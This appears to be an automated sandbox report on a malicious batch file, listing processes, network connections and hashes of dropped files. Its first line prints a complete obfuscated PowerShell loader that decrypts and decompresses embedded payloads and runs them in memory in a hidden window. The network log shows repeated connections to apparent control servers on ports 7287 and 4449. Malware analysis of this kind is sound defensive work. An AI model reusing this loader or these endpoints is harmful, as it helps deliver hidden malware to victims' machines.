C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\15.bat

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1716.18.613164890\1751689591" -childID 17 -isForBrowser -prefsHandle 7844 -prefMapHandle 6404 -prefsLen 28226 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c038c7b-35d0-4a97-b254-684fa5a3c099} 1716 "\\.\pipe\gecko-crash-server-pipe.1716" 3600 2e2aaf7f858 tab

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Downloads\jiteon.xlsx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.117.188.166:443 prod.ads.prod.webservices.mozgcp.net tcp
N/A 127.0.0.1:54846 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 35.83.153.5:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
US 8.8.8.8:53 128.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 5.153.83.35.in-addr.arpa udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 berryz.upnl.org udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
N/A 127.0.0.1:54855 tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:80 virustotal.com tcp
US 216.239.32.21:80 virustotal.com tcp
US 8.8.8.8:53 virustotal.com udp
US 8.8.8.8:53 virustotal.com udp
US 216.239.32.21:443 virustotal.com tcp
US 8.8.8.8:53 www.virustotal.com udp
US 74.125.34.46:443 www.virustotal.com tcp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.recaptcha.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
GB 142.250.180.3:443 www.recaptcha.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 21.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 46.34.125.74.in-addr.arpa udp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 104.201.58.216.in-addr.arpa udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net tcp
US 8.8.8.8:53 recaptcha.net udp
US 8.8.8.8:53 recaptcha.net udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 72.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.180.3:443 www.recaptcha.net udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:7287 193.222.96.128 tcp
NL 193.222.96.128:4449 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
NL 193.222.96.128:7287 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
NL 193.222.96.114:7287 193.222.96.114 tcp
US 8.8.8.8:53 114.96.222.193.in-addr.arpa udp
US 8.8.8.8:53 upnl.org udp
US 8.8.8.8:53 www.virustotal.com udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp
GB 142.250.200.35:443 recaptcha.net udp
US 8.8.8.8:53 ghs-svc-https-c46.ghs-ssl.googlehosted.com udp

Files

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\activity-stream.discovery_stream.json.tmp

MD5 693ff32e4cd773f59817c7b3639281b3
SHA1 60051804fd3d8ffd383a1231f1ed6ec5a0e0b36a
SHA256 460980fc6371a63ae9ed9d780e92bb009b5d89e6ea58e8d6b2dc1f349e2f7fda
SHA512 9f83776d152be6a6c0adf5190aef88a03b4e2048544f5cd1188d836e1e4dfcf8661de1158d7dcffedaa7bc6e0e7beb32733cb9597842a0015338d2d577a79197

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs.js

MD5 79a5f7718408e1c574181045c3006fa4
SHA1 9c84a78d7f434cd6df4ed2ca621cffa21bed9bd6
SHA256 2e8ff6d17d34689bee6a4c4554f1bf74394c64006c99cadfadb9ab7bf3c2d35c
SHA512 040b9be08a0d9d9904d79e5f8ea8f6dca5a5c5d2f8f6dbbb80b7637407ecf53aa9537286e9b17d15737284e67e7b9b2c9a7e67f4fb6764422dd7b23aa228db64

C:\Users\Admin\Downloads\15.9xj2mza4.bat.part

MD5 35c6d717dae5b57fdaf92e00d1002b73
SHA1 88111931546999a17cf45b2d1b4d65698d9d4fb4
SHA256 63f7b147b822af439064d521b1e3aeef276d835878cb5236bb8589d7a006dd91
SHA512 3374b3e1d3c2c01683300029c8d5b31bc3221854a76326d060b9e67c3cbdc38502c64b108da68fa7f030ce45d48bf7a2494bbd2ce71c97b4b9459fb12b5012a0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 9d45577855de876aa82d2816d5c0da84
SHA1 58efc74b99f8e36891a4baac33bfbbe1978c4f33
SHA256 0b963e26440f07e7bb70c825fa15448ed91ca64237b400adc4cb9c1a01632b1c
SHA512 7dff483423f85775f66db8665db4c6ccb20010708ea6398ae2751ff619701396c6d0ba422bb5d83d1f817e1f9c97f63681ed9062c18d5bdda0dd200da2b62fc1

C:\Users\Admin\Downloads\j8Xy3EYT.part

MD5 c4c06bc09d5d07d8abdb074e80806d07
SHA1 fd49f1d6c2fb26415c90b9e352b288f16e169b6c
SHA256 c5010ef902c9a8421aaf07a4ac475667c0b2ddae0b2d4c2f4c28aa7b7f482b3d
SHA512 6a8eb776b68d500645b1b4bbc4440e8e24e6f8340e3fe560ae96b8c127b26bd3a678782306e4b049aa9d4a1fc120f782307ac2ae166c84bcf73cffcd451a0626

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 225b9b48729c3baf4366d4a7c279db3c
SHA1 38ebcb2738c9310104a241d3f56222ac589db7d6
SHA256 7e03479ae01177c4ba7e920cfde5016e22378df53b5b6faf3a403a7946797620
SHA512 900414ca4ac8331a08563afe87322a31786e114aaafba0130ce82556d6663e557306cae0662a603df6288d58ade1e599c9167ce47b31c85b387956149c5ccafb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a9422c71a8a8f6de90613d8206318cb5
SHA1 79cacd76c1a999753129303f604f9f95cb6651b7
SHA256 0a470c0602d97da0e9a4b89b8c5b121bc34bea9b7cf244ace54b61f56eaf4047
SHA512 5f0cb53736c48e8e4dd1caad8997c2191d8839b37789715ca4574ee3d99ceabf1480b7713113c82047e8d15bd41820e5aed326d0388baeed6bdbd919a0c3fe2b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\209\{3cf30eb4-7f1e-4325-974c-30091a54e2d1}.final

MD5 c366a3613bd3d6329d43d12117ed4059
SHA1 d3e8e59672d2ce345769afd88a71fbb90d70943d
SHA256 582807864cf6905f2404f2bb7e84789d15afbb0bd5c9566e04cf7b8cb6c29a7b
SHA512 7087bec44839f155caa8a57a65d4fcc117796edb80a991a9bcea620be9d0a497841148f36f09fa4995ef4dd7bd65c566760ff9f32c48a154fb3cacf1737a127a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\prefs-1.js

MD5 9abc33b8ca1a06578ef8bca71ec43322
SHA1 82c782e8fa7e29c59105cb5bb36b99f7dde34007
SHA256 95ec09b5183c0491b2b70f2ef4fbc227ad2b2775d1b814a527015120a436455e
SHA512 dabcd6aad39d47a0a2e3bba424477e9b38f6fb903db1a29bb81e91b942a16617111449cedecbe9256ec550b981f29358f02c673fd035fd0e07f6a9686e2fc521

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 024791c1cdd8a03038756126fa4a173c
SHA1 1d34791566889fbc7b846e785df9cb461e834a9b
SHA256 a69a842dc910a3cc41849f0b66047e4b2debd9473562c2350444f9dc56f9cd31
SHA512 6f98b42a0cf7967e22a15e78803887327240f17300d3a808a3c74aef4236a005db41ce78c4bcf1d6c45e377447385b5f92b3170c3749f073386bb5a22a6498e2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CD429C0BD381706883301C98CDE6E7D5C78016A3

MD5 4861e569d02d0c578984183cd651ffe5
SHA1 4e4dd04189d00c245c6e9dbcba9604a9177756cf
SHA256 6654c00b3a1f8791b4811c56c4efef1e28d95c1e98b3f98ac9a4ec35d6663c2b
SHA512 68f5ff9dfa9d9e5dc3b35538d715db0231bee9ef67adf0503e0a5379da69d9a4dceaba980ad41faec6c14dbe818784144ad05d277a2b41b18b9e1853f5a3be03

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 13076b32d59d01a87a9a494b07ca2d1d
SHA1 00d54b2b92e6df485121c8cf4f62fee589331cbc
SHA256 260768d4123e8488b96b6adae0079e56d3cc1e7a645c194958f1fb6d3d51f054
SHA512 64541b6c1f923f111ef4c54364af7add46e0459e5a886ea4857670ce320aa03bb0cf13a03e7a1391ffa620a482ab653b195b2157be33815c0fd9e86584cb3dcf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 05e009145e690855ca12cfff216b1c45
SHA1 8c61a2fc5f23de5d156c86e78f782aea401edfbb
SHA256 df66b989fa7fd33642a72517827ce9929212cac45dea09fe338830704dd0f819
SHA512 41e17ac54767138c47e2f85e7989c08ca850d2033519495cb0938db6a093fc7523004956bf61871c77fb95661f8aae305c9d60ab814191876e1002b98acab55d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\5FD0A429C10B4A7BE6660E2A585C4CC16139F357

MD5 33d9578109e7b8cb9b758c6c86fbae04
SHA1 77e6fb34a7a81a21e3ee9f71c7107ca32174b430
SHA256 72eeb08781056d216d9dd58f21daf2b911a8c75f4df0c05e97e589ac7616115f
SHA512 6682d1c21c19a2ba9b62c4fbb7f39191076c7d1e9bdb6b6520f01ca9ff683b20e607a9489f46b67f680d99630020212f28d2917ad16691fb1d4e9eacaad7eed7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 a43c8a4b49f4d2b52e5fdf7a0901aa1f
SHA1 5b88d9df2af5e15a744158ab62b2298c6411483d
SHA256 4d6ec50de4787ba5de183564b2a77d62521c793d2207dbd2e3fd5bad7ebd844d
SHA512 0e158fac2dcdfe0af62edb8d6391cf309f8e451426c6b8fe1a87e1c1ceeb1d0a8a77fd245e0ae4a331c5169ed70c084ffe5a31ee4da3c0f22934580417256fcf

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\7734

MD5 962257cc4b1f6fc37f0dad96ffba0297
SHA1 88528e1e286b97d5d47e8cb51771ae1c0693455a
SHA256 2a09eefe078da07b725b937bb9f154ba7f14d07387a43ebe23174575883a1719
SHA512 1798d598deb8fdd340fd3f657f42c08797efbb7ea0642bad4bc47939a95368bdd7da162d1a6a2213a0abf74b6ff49bc10c2464828462880b775d5408e01c50a0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\14400

MD5 5dd67af96496e6bf1a96371857e5a438
SHA1 40d894dc12130b84935b95b6b1b0c911e06dc7b0
SHA256 8f77b28e5cf9603ef7655fd327017d9da1a53bdcf900c98fc11c5a698ad77e9e
SHA512 db5a33268a29812997932cefaf601a1537b8624ac9d8daa0ecbe6bf2194084f9e0cf7cf318bb09c78cea83df2c446a7d610d5ac0dd24b93dd9c44e7fe4e86d13

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\30279

MD5 7226a2c1b469319e1d1a6b8ed8ec098d
SHA1 abb00ccb8fccf1471d0367626ab44d6be8de0e1b
SHA256 284f2763bb292acf236f7a8c13e264cc96b9fbd1bf1c33a289fe4086075e347f
SHA512 993eff6a5ca6e8f0fbb5bb523de167744fae0b623efb15f81cd809110f2444c2b7cbe8e612a11752fa6cde114e9385cc9bced9ddae6d0e0a675839a69c4c6eba

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\2DEB3B81EB96245D9BC1CF71DE19C61850835DAB

MD5 582a396c57b1b335c222ae3bed8a9dfd
SHA1 4213825fea492edcc9b90b2a905d73f9291f9e1f
SHA256 6ff71a2e1c9d0f3481702d39814e92d49a9084890329e356adb9a5680dcb32ee
SHA512 4a9b3453e050571b4cb669212f2846557a45bc1badc5d78ebc556755fa50952456d3343fbf1c0c89df329baf530c6c90b5bdc790b841ab6348479e556c0c3a0b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\entries\CDEF1D88929A4E5F3AE6D1E3DA63A8C22367DA61

MD5 4d46ad0edee42a2b403870ecf90818a2
SHA1 1c20417c6a51d87f281a1cb246765ddb0b1a825f
SHA256 9ebfb2458220b83ec9ba01fa25742e83e8fea98892852ded0c8e89efce232a6e
SHA512 d9c935021525671fdca5a845587e5aba20a07d46e2e22ed41052a5f545ed72c7fa65e5596a8b76f1f9ba7436f5eb8f92b5296a32c9e6e691fdd25fc9647366ee

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 555f4c049fc6677fa3537e09c8eb19b1
SHA1 1350b1a76afdc7a7eeeaf660c5d6dd744d0117ad
SHA256 9b0eff31ad36b0cd28c0849df12f77d50f6d1e54bb4e759df95017360b20d24b
SHA512 360e2df7b4296c2306c4521d24666d73c442e412ea6cf9796d100512f04b5989f6aa43f874ad7a072273823c00b425e08245eda48c9e1847cc8e8e1f16d81dbf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 87515eb5c521398bbdeeeac2aef999f6
SHA1 24ecda5a9292ac0b871bde3368e01447ba69699c
SHA256 aaded946266da09d2743dd7842e3ccc18fd845a7e2bec3f4e3bdba1465881e6b
SHA512 44b9e36a60335f9831e8372f29268feb7736f38a61fa27f5e68afe85cddf97bbe4542cc4432fd8e520fc759d84481998008143e6b76177c5e453c8ffc4b8b2e8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 e51f232bc4cbfc48b541367f45e21384
SHA1 86633bc4d5dc2614a243e31531ee39788a01446d
SHA256 7957556d44d532ce77712a42ecaa95ac46a56a19a41991126877ffe9e052e7e7
SHA512 ffe6080595e10a0beda6c33e05962f105b07f5fa3ba7a6935260223a6cae82aac3a81688d887d74a2a5a48ee90a6d2e189316f08e4faff2ae76e0fdbc09781fe

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\18062

MD5 14a7082b4e103d9b018619fc0f26bf27
SHA1 de05df0a41cc0a43383418917952b482b74dd784
SHA256 042d23113703061cec5fa02e8e9ea432a47b3f3724b5e4f2c55c07f5597a483a
SHA512 b27e6ea730ba9ff2a98f857560527b8542bac143d24bdf51ab15c59e1a340c2baf32064e0f8cd29019a48c30d4908d205f036dc2af8e19345069ac74f72cc7a6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\19277

MD5 7d6d12827d131d8ce30f24124ea651f7
SHA1 aef07c3631ddc6c4f362b5ea33c4655fbd1d3ab8
SHA256 84ff659ce20750b475d166ae91b639a83ba91a1ebe9e34317e6f187c2cc57af1
SHA512 8285cc8abeb8c176194f897a282d1ac0f259cdd462221709c19b9a43c3ec1db055adc5ea7bbe4602a60d5bef550bf36407389e492ebc529210bd17b6b8cec78a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\3970

MD5 f2fee7c427cda1a35bce36890ff4673d
SHA1 06badf878dbd25bdc29a86257e1dbb932e75f6af
SHA256 05d8dfbbaefb97243519d098798f955fa0548e7f01614cb4ee4c522fbd260263
SHA512 e9e8e7868b9bbe2546aac5545b2e350f849bc0ecd7591dd2803d22f1464450c45816dbed6fda06e3d9f4da3c067f86add977ca360ff3351e1f741e94b680f641

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\29197

MD5 6d97726f5ee79dcdd1087602ee2f09c2
SHA1 40be3e8e02a6bb60308db6bd853cd02c819ddf80
SHA256 d2c12d4f7083a71178bd130fa404b745f4f1e7edddebf4ed24dc60626d5379fb
SHA512 aecbc650e2c48f3141622311fe42fd9f818bd24a9e8d5a5a5eadc5e85ab9d51844537e2e7fecd2842ae63417bcef2a484e937095c50808c0fac0637021f3dc1b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\23466

MD5 3cca23028a58cf16779bd9cd8653239a
SHA1 ca90931a22b76c990a21660447f197484f5c35da
SHA256 75cb9709b262d0bf9c83bce4099e8131b4b0c34c6054ab471e2311f88cb9c752
SHA512 b9afe7fcd3608ab1a4e99abbc1d8ed0c25125f2cdfd524986a5117e9730d09207b2bc647a6cc6ad824069c2f75a184b0be361a7612c553a3ab05f296a99a81e3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\sessionstore-backups\recovery.jsonlz4

MD5 52b28c3c39b58a03f8eb86ff16b39037
SHA1 3f971763bc4079f7014df21f7310c990b8786701
SHA256 b51b45741090158669765efdcd65724e96d1d345a7eb76bedda60bc2ef284981
SHA512 c7b97d9bfad271bd77fa9b59977e76fa3f3c9321b05a3be4f40a980b5b4bafebb95116d985cf77356ab276eb6a18f598961167b0ed69db9830084814f961ebac

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4886

MD5 ff840688f1e1c2c61863b1e991f67c6a
SHA1 39b6a7288c09820bc0c5d6f79ac07d4ef8a0ed08
SHA256 1e6e5fefe29eaf0ddb94e5a81ffa045a2ba64842987dd04e1cdc9be4fc0a1fa5
SHA512 afba32cfc621497f0939b9ab05323e90a15462d2a259d85ea1743c851206a82442d89249cf44a72f4f0f5b89b26d05adcb5238e09e3a95da766d4896c086a371

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\storage\default\https+++www.virustotal.com\cache\morgue\130\{17af9a56-5010-46a2-ac79-6c7554593e82}.final

MD5 348c636bbe2e41df45dbda54355c07ca
SHA1 3fcfef47d5332bab30273a819c455c9ec1e426d7
SHA256 aff4bc4b8f2f2b1a2ae88b927024bd55ae13c2a87b9dd026cce5ebf2fe1ac5f6
SHA512 286b0546b1fa49b43a0346ab7e0d2a19bf223292961d1ce5fbcef6a44345f3cb63f6e53bec8363046f52751df90b9f910177e76664a8c867038e3022812936a0

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\4890

MD5 7407da52b3ed64e6fab83232e5bca8b7
SHA1 7f149b2540382807f1587bf186ed18d28c965ba4
SHA256 a103eb9a79c41e0f4ba0deb3b91b8e0f0682f3140cf4bf3942ff64f91dc375ac
SHA512 4ab3f2441c18688b6838a4ce74086a79eb9297e2e7c4e6ff10cdfbd6d935a8af5a70482e4d0c821d1e4a4cd7aab2414d0b68b73a2ef89675e3795c6755c5d017

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\1302

MD5 ef2d6e3cd9f801bfc92684ed82033ae7
SHA1 8cda1e3524ed236f677bee4e3bf4ccc1590b3ca8
SHA256 a225b0a6a37eef2b1bf6b3fce44f158ce1b77a68a733625e3df47f7ea7c65771
SHA512 4d54cb03b29e2f730af5930c1ef79eaabe0b3168a3019a27e7f4bcdd7e08f3acf98ffa474059103a3ccc7948a959437550f7a1aaeb1ab8a83bd8a92f626e8309

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\27427

MD5 a0c4de0522adc2ff8af5000c366caefd
SHA1 145b0f7ec2b7ac2f5969c517937fc5a32368ea54
SHA256 3526ed5ec53c73251965fc0bd28a4532d622a6ebcd862b2f5f23ddfb96868367
SHA512 cc3f27142c6720b41104a46334d595e1ae97c3292daaff9e7a63e3db5e68da79e0207eed1f6a9fedcc19c3daada120d4ba1e915732a77e94398d4e0dd76bf78a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\x1hfm7fd.default-release\cache2\doomed\28193

MD5 27a1101ef6d68f189f23a2bfcf123f53
SHA1 f4a7903e13b83f564e48137349173bc62a3c3820
SHA256 6e0aa833b909a83af466f670bedbaa9c8d190465014ca536817648dcf51b371d
